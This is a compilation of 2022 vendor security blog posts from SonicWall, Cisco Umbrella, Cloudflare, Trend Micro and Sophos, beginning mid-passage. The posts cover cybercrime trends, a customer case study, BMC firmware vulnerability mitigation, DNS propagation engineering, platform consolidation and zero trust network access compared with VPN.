Then came the Fourth Industrial Revolution, which some argue ended just before the pandemic. The blaze of technological advancements from the previous period facilitated the introduction of personal computing, mobile devices and the Internet of Things (IoT) – developments that forced us to redefine the boundaries between the physical, digital, and biological worlds. Advancements in artificial intelligence (AI), robotics, 3D printing, genetic engineering, quantum computing, and other technologies added to social pressures that blurred traditional boundaries to the point of confusion.

The Fifth Industrial Revolution: Societal Fusion

Many global thinkers believe we are in the throes of a Fifth Industrial Revolution (also “5IR”) that inaugurated new metrics for productivity that go beyond measuring the output of humans and machines in the workplace. We are witnessing a fusion of human abilities and machine efficiencies in this context. The physical, digital and biological spheres are now interchangeable and intertwined. So, it’s not just about connecting people to machines but also about connecting devices to other machines, all in the name of human creativity and productivity.

One remarkable aspect of 5IR is that it is happening at an unprecedented rate. For example, accelerated by the COVID pandemic, remote network and wireless communication saw an enormous surge as Work-From-Home became a permanent fixture for the Western workforce; thus, workplace and home were fused. And along with that fusion came education and home. But other fusions are more challenging to discern, such as information and misinformation, news and propaganda, political action and terrorism, and so on, which leads us to the fusion between crime and cybersecurity.

Learn and Explore the Impacts of the 5IR and Cybersecurity

Interestingly, a very high percentage of successful ransomware hits are due to people bypassing or ignoring cybersecurity protocols simply because they don’t believe they could ever become a victim. Unfortunately, the same can be said about organizations that have not yet prioritized updating their security technology. Many owners and managers don’t understand the threats and think that ransomware only happens to bigger companies. Current threat reports prove that the impulse to avoid and dodge better cybersecurity is incorrect, and that’s the part that we’re struggling with the most.

The $10.5T question (est. cost of cybercrime per year by 2025) is how much effort we will expend to correct this trend. Cybercrime is one of the most complex byproducts of our “revolutions.” As a result of the surge in new threats, technology and behavior is rapidly evolving. Taking responsibility and deploying new cybersecurity technology will help us mitigate today’s risks.

Book your seat to learn more during our next MINDHUNTER #9 episode in June.

This post is also available in: Portuguese (Brazil) French German Spanish Italian

Source :
https://blog.sonicwall.com/en-us/2022/05/cybersecurity-in-the-fifth-industrial-revolution/

Cisco Umbrella Named a 2022 SC Awards Finalist for Best SME Security Solution

SC Awards from SC Media are known for honoring the best people, products and companies in cybersecurity. One of the industry’s most respected media outlets, SC Media enlists a select pool of experts from the information security community to review more than 800 entries in 35+ categories.

Last year Cisco Umbrella took home SC’s top award for Best SME Security Solution, and we are thrilled to be a finalist again this year – with the winner to be announced in August.

Small and mid-size enterprises need an effective, easy-to-deploy security solution

We firmly believe small and medium-sized businesses deserve big protection. The chilling statistic that 60% of small- and medium-sized businesses go out of business within six months of a cyberattack1 underscores the need for an effective and easy to implement security solution for companies that are likely to have little or no dedicated IT staff.

Blocking threats before they reach the network, endpoints, and end users, Umbrella enables even small IT teams to monitor and respond to threats effectively – like it does for Cape Air.

Cape Air uses Cisco Umbrella to simplify operations and improve security

Headquartered in Hyannis, Massachusetts, Cape Air is a regional airline that provides service to some of the world’s most beautiful destinations.  But when frequent malware infections disrupt core services and the customer experience, the brand reputation suffers. For Cape Air, service delays due to malware infections became a common challenge.

Brett Stone, Cape Air’s network operations manager needed to stop threats before they caused service outages. He recognized that Cisco Umbrella could help Cape Air reduce infections since it blocks malware, phishing, command-and-control requests, and other threats at the DNS layer before a connection is even established.

He configured Umbrella within 30 minutes — and saw immediate results:

“From the moment we deployed Umbrella, it was like night and day in the number of tickets we had open because of infections and PCs that kept getting compromised in the past. We were amazed because the next day we didn’t have to fix these problems anymore. Then we could do all those other things that were important to us; we finally had time for them.” – Brett Stone

Stone recalls how malware remediation used to consume all of Cape Air’s network technicians’ time. “Before Umbrella, I had three technicians working 40 hours a week, and all they did for a year was fix malware infections and reimage computers,” Stone recalls. “Thankfully, those days are gone. Now we have zero, or rarely one, malware infection. I don’t remember the last time something got through Cisco Umbrella within the last year or two.”

Want to learn more about how Cisco Umbrella serves small-to-midsize businesses?

Threats are never going to stop coming. But with simple deployment and powerful protection, visibility, and performance, Cisco Umbrella can provide the big protection you need.

Check out our ebook Big Threats to Small Business to learn more about how we meet the unique cybersecurity needs of small and medium sized businesses. And if you’re ready to see our solution in action, check out a free Cisco Umbrella Live Demo.

Source :
https://umbrella.cisco.com/blog/cisco-umbrella-named-2022-sc-awards-finalist-best-sme-security-solution

Cloudflare’s approach to handling BMC vulnerabilities

In recent years, management interfaces on servers like a Baseboard Management Controller (BMC) have been the target of cyber attacks including ransomware, implants, and disruptive operations. Common BMC vulnerabilities like Pantsdown and USBAnywhere, combined with infrequent firmware updates, have left servers vulnerable.

We were recently informed from a trusted vendor of new, critical vulnerabilities in popular BMC software that we use in our fleet. Below is a summary of what was discovered, how we mitigated the impact, and how we look to prevent these types of vulnerabilities from having an impact on Cloudflare and our customers.

Background

A baseboard management controller is a small, specialized processor used for remote monitoring and management of a host system. This processor has multiple connections to the host system, giving it the ability to monitor hardware, update BIOS firmware, power cycle the host, and many more things.

Access to the BMC can be local or, in some cases, remote. With remote vectors open, there is potential for malware to be installed on the BMC from the local host via PCI Express or the Low Pin Count (LPC) interface. With compromised software on the BMC, malware or spyware could maintain persistence on the server.

According to the National Vulnerability Database, the two BMC chips (ASPEED AST2400 and AST2500) have implemented Advanced High-Performance Bus (AHB) bridges, which allow arbitrary read and write access to the physical address space of the BMC from the host. This means that malware running on the server can also access the RAM of the BMC.

These BMC vulnerabilities are sufficient to enable ransomware propagation, server bricking, and data theft.

Impacted versions

Numerous vulnerabilities were found to affect the QuantaGrid D52B cloud server due to vulnerable software found in the BMC. These vulnerabilities are associated with specific interfaces that are exposed on AST2400 and AST2500 and explained in CVE-2019-6260. The vulnerable interfaces in question are:

  • iLPC2AHB bridge Pt I
  • iLPC2AHB bridge Pt II
  • PCIe VGA P2A bridge
  • DMA from/to arbitrary BMC memory via X-DMA
  • UART-based SoC Debug interface
  • LPC2AHB bridge
  • PCIe BMC P2A bridge
  • Watchdog setup

An attacker might be able to update the BMC directly using SoCFlash through inband LPC or BMC debug universal async receiver-transmitter (UART) serial console. While this might be thought of as a usual path in case of total corruption, this is actually an abuse within SoCFlash by using any open interface for flashing.

Mitigations and response

Updated firmware

We reached out to one of our manufacturers, Quanta, to validate that existing firmware within a subset of systems was in fact patched against these vulnerabilities. While some versions of our firmware were not vulnerable, others were. A patch was released, tested, and deployed on the affected BMCs within our fleet.

Cloudflare Security and Infrastructure teams also proactively worked with additional manufacturers to validate their own BMC patches were not explicitly vulnerable to these firmware vulnerabilities and interfaces.

Reduced exposure of BMC remote interfaces

It is a standard practice within our data centers to implement network segmentation to separate different planes of traffic. Our out-of-band networks are not exposed to the outside world and only accessible within their respective data centers. Access to any management network goes through a defense in depth approach, restricting connectivity to jumphosts and authentication/authorization through our zero trust Cloudflare One service.

Reduced exposure of BMC local interfaces

Applications within a host are limited in what can call out to the BMC. This is done to restrict what can be done from the host to the BMC and allow for secure in-band updating and userspace logging and monitoring.

Do not use default passwords

This sounds like common knowledge for most companies, but we still follow a standard process of changing not just the default username and passwords that come with BMC software, but disabling the default accounts to prevent them from ever being used. Any static accounts follow a regular password rotation.

BMC logging and auditing

We log all activity by default on our BMCs. Logs that are captured include the following:

  • Authentication (Successful, Unsuccessful)
  • Authorization (user/service)
  • Interfaces (SOL, CLI, UI)
  • System status (Power on/off, reboots)
  • System changes (firmware updates, flashing methods)

We were able to validate that there was no malicious activity detected.

What’s next for the BMC

Cloudflare regularly works with several original design manufacturers (ODMs) to produce the highest performing, efficient, and secure computing systems according to our own specifications. The standard processors used for our baseboard management controller often ship with proprietary firmware which is less transparent and more cumbersome to maintain for us and our ODMs. We believe in improving on every component of the systems we operate in over 270 cities around the world.

OpenBMC

We are moving forward with OpenBMC, an open-source firmware for our supported baseboard management controllers. Based on the Yocto Project, a toolchain for Linux on embedded systems, OpenBMC will enable us to specify, build, and configure our own firmware based on the latest Linux kernel featureset per our specification, similar to the physical hardware and ODMs.

OpenBMC firmware will enable:

  • Latest stable and patched Linux kernel
  • Internally-managed TLS certificates for secure, trusted communication across our isolated management network
  • Fine-grained credentials management
  • Faster response time for patching and critical updates

While many of these features are community-driven, vulnerabilities like Pantsdown are patched quickly.

Extending secure boot

You may have read about our recent work securing the boot process with a hardware root-of-trust, but the BMC has its own boot process that often starts as soon as the system gets power. Newer versions of the BMC chips we use, as well as leveraging cutting edge security co-processors, will allow us to extend our secure boot capabilities prior to loading our UEFI firmware by validating cryptographic signatures on our BMC/OpenBMC firmware. By extending our security boot chain to the very first device that has power to our systems, we greatly reduce the impact of malicious implants that can be used to take down a server.

Conclusion

While this vulnerability ended up being one we could quickly resolve through firmware updates with Quanta and quick action by our teams to validate and patch our fleet, we are continuing to innovate through OpenBMC, and secure root of trust to ensure that our fleet is as secure as possible. We are grateful to our partners for their quick action and are always glad to report any risks and our mitigations to ensure that you can trust how seriously we take your security.

Source :
https://blog.cloudflare.com/bmc-vuln/

How we improved DNS record build speed by more than 4,000x

Since my previous blog about Secondary DNS, Cloudflare’s DNS traffic has more than doubled from 15.8 trillion DNS queries per month to 38.7 trillion. Our network now spans over 270 cities in over 100 countries, interconnecting with more than 10,000 networks globally. According to w3 stats, “Cloudflare is used as a DNS server provider by 15.3% of all the websites.” This means we have an enormous responsibility to serve DNS in the fastest and most reliable way possible.

Although the response time we have on DNS queries is the most important performance metric, there is another metric that sometimes goes unnoticed. DNS Record Propagation time is how long it takes changes submitted to our API to be reflected in our DNS query responses. Every millisecond counts here as it allows customers to quickly change configuration, making their systems much more agile. Although our DNS propagation pipeline was already known to be very fast, we had identified several improvements that, if implemented, would massively improve performance. In this blog post I’ll explain how we managed to drastically improve our DNS record propagation speed, and the impact it has on our customers.

How DNS records are propagated

Cloudflare uses a multi-stage pipeline that takes our customers’ DNS record changes and pushes them to our global network, so they are available all over the world.

The steps shown in the diagram above are:

  1. Customer makes a change to a record via our DNS Records API (or UI).
  2. The change is persisted to the database.
  3. The database event triggers a Kafka message which is consumed by the Zone Builder.
  4. The Zone Builder takes the message, collects the contents of the zone from the database and pushes it to Quicksilver, our distributed KV store.
  5. Quicksilver then propagates this information to the network.

Of course, this is a simplified version of what is happening. In reality, our API receives thousands of requests per second. All POST/PUT/PATCH/DELETE requests ultimately result in a DNS record change. Each of these changes needs to be actioned so that the information we show through our API and in the Cloudflare dashboard is eventually consistent with the information we use to respond to DNS queries.

Historically, one of the largest bottlenecks in the DNS propagation pipeline was the Zone Builder, shown in step 4 above. Responsible for collecting and organizing records to be written to our global network, our Zone Builder often ate up most of the propagation time, especially for larger zones. As we continue to scale, it is important for us to remove any bottlenecks that may exist in our systems, and this was clearly identified as one such bottleneck.

Growing pains

When the pipeline shown above was first announced, the Zone Builder received somewhere between 5 and 10 DNS record changes per second. Although the Zone Builder at the time was a massive improvement on the previous system, it was not going to last long given the growth that Cloudflare was and still is experiencing. Fast-forward to today, we receive on average 250 DNS record changes per second, a staggering 25x growth from when the Zone Builder was first announced.

The way that the Zone Builder was initially designed was quite simple. When a zone changed, the Zone Builder would grab all the records from the database for that zone and compare them with the records stored in Quicksilver. Any differences were fixed to maintain consistency between the database and Quicksilver.

This is known as a full build. Full builds work great because each DNS record change corresponds to one zone change event. This means that multiple events can be batched and subsequently dropped if needed. For example, if a user makes 10 changes to their zone, this will result in 10 events. Since the Zone Builder grabs all the records for the zone anyway, there is no need to build the zone 10 times. We just need to build it once after the final change has been submitted.

What happens if the zone contains one million records or 10 million records? This is a very real problem, because not only is Cloudflare scaling, but our customers are scaling with us. Today our largest zone currently has millions of records. Although our database is optimized for performance, even one full build containing one million records took up to 35 seconds, largely caused by database query latency. In addition, when the Zone Builder compares the zone contents with the records stored in Quicksilver, we need to fetch all the records from Quicksilver for the zone, adding time. However, the impact doesn’t just stop at the single customer. This also eats up more resources from other services reading from the database and slows down the rate at which our Zone Builder can build other zones.

Per-record build: a new build type

Many of you might already have the solution to this problem in your head:

Why doesn’t the Zone Builder just query the database for the record that has changed and propagate just the single record?

Of course this is the correct solution, and the one we eventually ended up at. However, the road to get there was not as simple as it might seem.

Firstly, our database uses a series of functions that, at zone touch time, create a PostgreSQL Queue (PGQ) event that ultimately gets turned into a Kafka event. Initially, we had no distinction for individual record events, which meant our Zone Builder had no idea what had actually changed until it queried the database.

Next, the Zone Builder is still responsible for DNS zone settings in addition to records. Some examples of DNS zone settings include custom nameserver control and DNSSEC control. As a result, our Zone Builder needed to be aware of specific build types to ensure that they don’t step on each other. Furthermore, per-record builds cannot be batched in the same way that zone builds can because each event needs to be actioned separately.

As a result, a brand new scheduling system needed to be written. Lastly, Quicksilver interaction needed to be re-written to account for the different types of schedulers. These issues can be broken down as follows:

  1. Create a new Kafka event pipeline for record changes that contain information about the changed record.
  2. Separate the Zone Builder into a new type of scheduler that implements some defined scheduler interface.
  3. Implement the per-record scheduler to read events one by one in the correct order.
  4. Implement the new Quicksilver interface for the per-record scheduler.

Below is a high level diagram of how the new Zone Builder looks internally with the new scheduler types.

It is critically important that we lock between these two schedulers because it would otherwise be possible for the full build scheduler to overwrite the per-record scheduler’s changes with stale data.

It is important to note that none of this per-record architecture would be possible without the use of Cloudflare’s black lie approach to negative answers with DNSSEC. Normally, in order to properly serve negative answers with DNSSEC, all the records within the zone must be canonically sorted. This is needed in order to maintain a list of references from the apex record through all the records in the zone. With this normal approach to negative answers, a single record that has been added to the zone requires collecting all records to determine its insertion point within this sorted list of names.

Bugs

I would love to be able to write a Cloudflare blog where everything went smoothly; however, that is never the case. Bugs happen, but we need to be ready to react to them and set ourselves up so that next time this specific bug cannot happen.

In this case, the major bug we discovered was related to the cleanup of old records in Quicksilver. With the full Zone Builder, we have the luxury of knowing exactly what records exist in both the database and in Quicksilver. This makes writing and cleaning up a fairly simple task.

When the per-record builds were introduced, record events such as creates, updates, and deletes all needed to be treated differently. Creates and deletes are fairly simple because you are either adding or removing a record from Quicksilver. Updates introduced an unforeseen issue due to the way that our PGQ was producing Kafka events. Record updates only contained the new record information, which meant that when the record name was changed, we had no way of knowing what to query for in Quicksilver in order to clean up the old record. This meant that any time a customer changed the name of a record in the DNS Records API, the old record would not be deleted. Ultimately, this was fixed by replacing those specific update events with both a creation and a deletion event so that the Zone Builder had the necessary information to clean up the stale records.

None of this is rocket surgery, but we spend engineering effort to continuously improve our software so that it grows with the scaling of Cloudflare. And it’s challenging to change such a fundamental low-level part of Cloudflare when millions of domains depend on us.

Results

Today, all DNS Records API record changes are treated as per-record builds by the Zone Builder. As I previously mentioned, we have not been able to get rid of full builds entirely; however, they now represent about 13% of total DNS builds. This 13% corresponds to changes made to DNS settings that require knowledge of the entire zone’s contents.

When we compare the two build types as shown below we can see that per-record builds are on average 150x faster than full builds. The build time below includes both database query time and Quicksilver write time.

From there, our records are propagated to our global network through Quicksilver.

The 150x improvement above is with respect to averages, but what about that 4000x that I mentioned at the start? As you can imagine, as the size of the zone increases, the difference between full build time and per-record build time also increases. I used a test zone of one million records and ran several per-record builds, followed by several full builds. The results are shown in the table below:

Build TypeBuild Time (ms)
Per Record #16
Per Record #27
Per Record #36
Per Record #48
Per Record #56
Full #134032
Full #233953
Full #334271
Full #434121
Full #534093

We can see that, given five per-record builds, the build time was no more than 8ms. When running a full build however, the build time lasted on average 34 seconds. That is a build time reduction of 4250x!

Given the full build times for both average-sized zones and large zones, it is apparent that all Cloudflare customers are benefitting from this improved performance, and the benefits only improve as the size of the zone increases. In addition, our Zone Builder uses less database and Quicksilver resources meaning other Cloudflare systems are able to operate at increased capacity.

Next Steps

The results here have been very impactful, though we think that we can do even better. In the future, we plan to get rid of full builds altogether by replacing them with zone setting builds. Instead of fetching the zone settings in addition to all the records, the zone setting builder would just fetch the settings for the zone and propagate that to our global network via Quicksilver. Similar to the per-record builds, this is a difficult challenge due to the complexity of zone settings and the number of actors that touch it. Ultimately if this can be accomplished, we can officially retire the full builds and leave it as a reminder in our git history of the scale at which we have grown over the years.

In addition, we plan to introduce a batching system that will collect record changes into groups to minimize the number of queries we make to our database and Quicksilver.

Does solving these kinds of technical and operational challenges excite you? Cloudflare is always hiring for talented specialists and generalists within our Engineering and other teams.

Source :
https://blog.cloudflare.com/dns-build-improvement/

Trend Micro’s One Vision, One Platform

The world moves fast sometimes. Just two years ago, organizations were talking vaguely about the need to transform digitally, and ransomware began to make headlines outside the IT media circle. Fast forward to 2022, and threat actors have held oil pipelines and critical food supply chains hostage, while many organizations have passed a digital tipping point that will leave them forever changed. Against this backdrop, CISOs are increasingly aware of running disjointed point products’ cost, operational, and risk implications.

That’s why Trend Micro is transforming from a product- to a platform-centric company. From the endpoint to the cloud, we’re focused on helping our customers prepare for, withstand, and rapidly recover from threats—freeing them to go further and do more. Analysts seem to agree.

Unprecedented change

The digital transformation that organizations underwent during the pandemic was, in some cases, unprecedented. It helped them adapt to a new reality of remote and now hybrid working, supply chain disruption, and rising customer expectations. The challenge is that these investments in cloud infrastructure and services are broadening the corporate attack surface. In many cases, in-house teams are drowning in new attack techniques and cloud provider features. This can lead to misconfigurations which open the door to hackers.

Yet even without human error, there’s plenty for the bad guys to target in modern IT environments—from unpatched vulnerabilities to accounts protected with easy-to-guess or previously breached passwords. That means threat prevention isn’t always possible. Instead, organizations are increasingly looking to augment these capabilities with detection and response tooling like XDR to ensure incidents don’t turn into large-scale breaches. It’s important that these tools are able to prioritize alerts. Trend Micro found that as many as 70% of security operations (SecOps) teams are emotionally overwhelmed with the sheer volume of alerts they’re forced to deal with.

SecOps staff and their colleagues across the IT function are stretched to the limit by these trends, which are compounded by industry skills shortages. The last thing they need is to have to swivel-chair between multiple products to find the right information.

What Gartner says

Analyst firm Gartner is observing the same broad industry trends. In a recent report, it claimed that:

  • Vendors are increasingly divided into “platform” and “portfolio” providers—the latter providing products with little underlying integration
  • By 2025, 70% of organizations will reduce to a maximum of three the number of vendors they use to secure cloud-native applications
  • By 2027, half of the mid-market security buyers will use XDR to help consolidate security technologies such as endpoint, cloud, and identity
  • Vendors are increasingly integrating diverse security capabilities into a single platform. Those which minimize the number of consoles and configuration planes, and reuse components and information, will generate the biggest benefits

The power of one

This is music to our ears. It is why Trend Micro introduces a unified cybersecurity platform, delivering protection across the endpoint, network, email, IoT, and cloud, all tied together with threat detection and response from our Vision One platform. These capabilities will help customers optimize protection, detection, and response, leveraging automation across the key layers of their IT environment in a way that leaves no coverage gaps for the bad guys to hide in.

There are fewer overheads and hands-on decisions for stretched security teams with fewer vendors to manage, a high degree of automation, and better alert prioritization. Trend Micro’s unified cybersecurity platform vision also includes Trend Micro Service One for 24/7/365 managed detection, response, and support—to augment in-house skills and let teams focus on higher-value tasks.

According to Gartner, the growth in market demand for platform-based offerings has led some vendors to bundle products as a portfolio despite no underlying synergy. This can be a “worst of all worlds,” as products are neither best-of-breed nor do they reduce complexity and overheads, it claims.

We agree. That’s why Trend Micro offers a fundamentally more coherent platform approach. We help organizations continuously discover an ever-changing attack surface, assess risks and then take streamlined steps to mitigate that risk—applying the right security at the right time. That’s one vision, one platform, and total protection.

To find out more about Trend Micro One, please visit: https://www.trendmicro.com/platform-one

Source :
https://www.trendmicro.com/en_us/research/22/e/platform-centric-enterprise-cybersecurity-protection.html

Zero trust network access (ZTNA) versus remote access VPN

Remote access VPN has long served us well, but the recent increase in remote working has cast a spotlight on the limitations of this aging technology.Written by Tejas KashyapMAY 20, 2022PRODUCTS & SERVICESZTNA

Remote access VPN has been a staple of most networks for decades, providing a secure method to remotely access systems and resources on the network. However, VPN was developed to mimic the experience of being in the office. Once you’re in, you’ve got broad access to everything.

Zero trust network access (ZTNA), on the other hand, can be summed up in four words: trust nothing, verify everything. It’s based on the principle that any connection to your network should be treated as hostile until it’s been authenticated, authorized, and granted access to resources.

Simply put: with virtual private networking (VPN), you’re providing broad network access. With ZTNA, you’re providing specific application access.

Traditional remote access VPN vs. ZTNA

There are several differences between traditional remote access VPN and ZTNA. Here are some important ones, covering trust, device health, administration, and more.

Trust

With remote access VPN, users are implicitly trusted with broad access to resources, which can create serious security risks.

ZTNA treats each user and device individually so that only the resources that user and device are allowed to access are made available. Instead of granting users complete freedom of movement on the network, individual tunnels are established between the user and the specific gateway for the application they’re authorized to access – and nothing more.

Device health

Remote access VPN has no awareness of the health state of a connecting device. If a compromised device connects via VPN, it could affect the rest of the network.

ZTNA integrates device compliance and health into access policies, giving you the option to exclude non-compliant, infected, or compromised systems from accessing corporate applications and data. This greatly reduces the risk of data theft or leakage.

Remote connections

Remote access VPN provides a single point-of-presence on the network, which means a potentially inefficient backhauling of traffic from multiple locations, datacenters, or applications through the remote access VPN tunnel.

ZTNA functions equally well and securely from any connection point, be it home, hotel, coffee shop, or office. Connection management is secure and transparent regardless of where the user and device are located, making it a seamless experience no matter where the user is working.

ZTNA is also a great way to ensure greater security controls during Remote Desktop Protocol (RDP) sessions. Known challenges with RDP include exposed default ports, no support for multi-factor authentication (MFA), broad network access, and of course security vulnerabilities. RDP server vulnerabilities and mistakenly-open RDP connections can be directly exploited by attackers, who leverage such exploits to identify themselves as trusted RDP users. With ZTNA, such users would be treated as hostile by ZTNA authentication features.

Visibility

Remote access VPN is unaware of the traffic and usage patterns it is facilitating, making visibility into user activity and application usage more challenging.

Since ZTNA access is micro-segmented, it can offer increased visibility into application activity. This makes monitoring application status, capacity planning, and licensing management and auditing much easier.

User experience

Remote access VPN clients are notorious for offering a poor user experience, adding latency or negatively impacting performance, suffering from connectivity issues, and generally being a burden on the helpdesk.

ZTNA provides a frictionless, seamless end-user experience by automatically establishing secure connections on demand. This is all done behind the scenes, so most users won’t even be aware of the ZTNA solution that’s helping protect their data.

Administration

Remote access VPN clients are difficult to set up, deploy, enroll new users, and decommission departing users. VPN is also challenging to administer on the firewall or gateway side, especially with multiple nodes, firewall access rules, IP management, traffic flows, and routing. It quickly becomes a full-time job.

ZTNA solutions are often much leaner, cleaner, and easier to deploy and manage. They’re also more agile in quickly changing environments with users, apps, and devices coming and going – making day-to-day administration quick and painless.

What to look for in a ZTNA solution

Be sure to consider these important capabilities when comparing ZTNA solutions from different vendors:

Cloud-delivered, cloud-managed

Cloud management offers tremendous benefits: being able to get up and running quickly, reduced management infrastructure, easy deployment and enrollment, and instant, secure access from anywhere on any device.

Integration with your other cybersecurity solutions

While most ZTNA solutions can work perfectly fine as standalone products, there are significant benefits from having a solution that is tightly integrated with your other cybersecurity products, such as your firewalls and endpoints. A common, integrated cloud management console can be a force multiplier for reducing training time and day-to-day management overhead.

It can also provide unique insights across your various IT security products, especially if they share telemetry. This can dramatically bolster security and offer real-time response when a compromised device or threat gets on the network.

User and management experience

Make sure the solution you’re considering offers both an excellent end-user experience as well as easy administration and management. With more users working remotely, enrollment and efficient device setup is critical when it comes to getting new users productive as quickly as possible.

Be sure to pay attention to how the ZTNA agent is deployed and how easy it is to add new users to policies. Also ensure the solution you’re investing in offers a smooth, frictionless experience for end users. It should also provide visibility into application activity to help you be proactive in identifying peak load, capacity, license usage, and even application issues.

Sophos ZTNA

Sophos ZTNA has been designed from the start to make zero trust network access easy, integrated, and secure.

It’s cloud-delivered, cloud-managed, and integrated into Sophos Central, the world’s most trusted cybersecurity platform. From Sophos Central, you can not only manage ZTNA, but also your Sophos firewalls, endpoints, server protection, mobile devices, cloud security, email protection, much more.

Sophos ZTNA is also unique in that it integrates tightly with both Sophos Firewall and Sophos Intercept X-protected endpoints to share real-time device health between the firewall, device, ZTNA, and Sophos Central to automatically respond to threats or non-compliant devices. It acts like a round-the-clock administrator, automatically limiting access and isolating compromised systems until they’re cleaned up.

Sophos customers agree that the time saving benefits of a fully integrated Sophos cybersecurity solution are enormous. They say that using the Sophos suite of products together for automatic threat identification and response is like doubling the size of their IT team. Of course, Sophos ZTNA will work with any other vendor’s security products, but it’s unique in working better together with the rest of the Sophos ecosystem to provide tangible real-world benefits to visibility, protection, and response.

Visit Sophos.com/ZTNA to learn more or try it for yourself.

Source :
https://news.sophos.com/en-us/2022/05/20/zero-trust-network-access-ztna-versus-remote-access-vpn/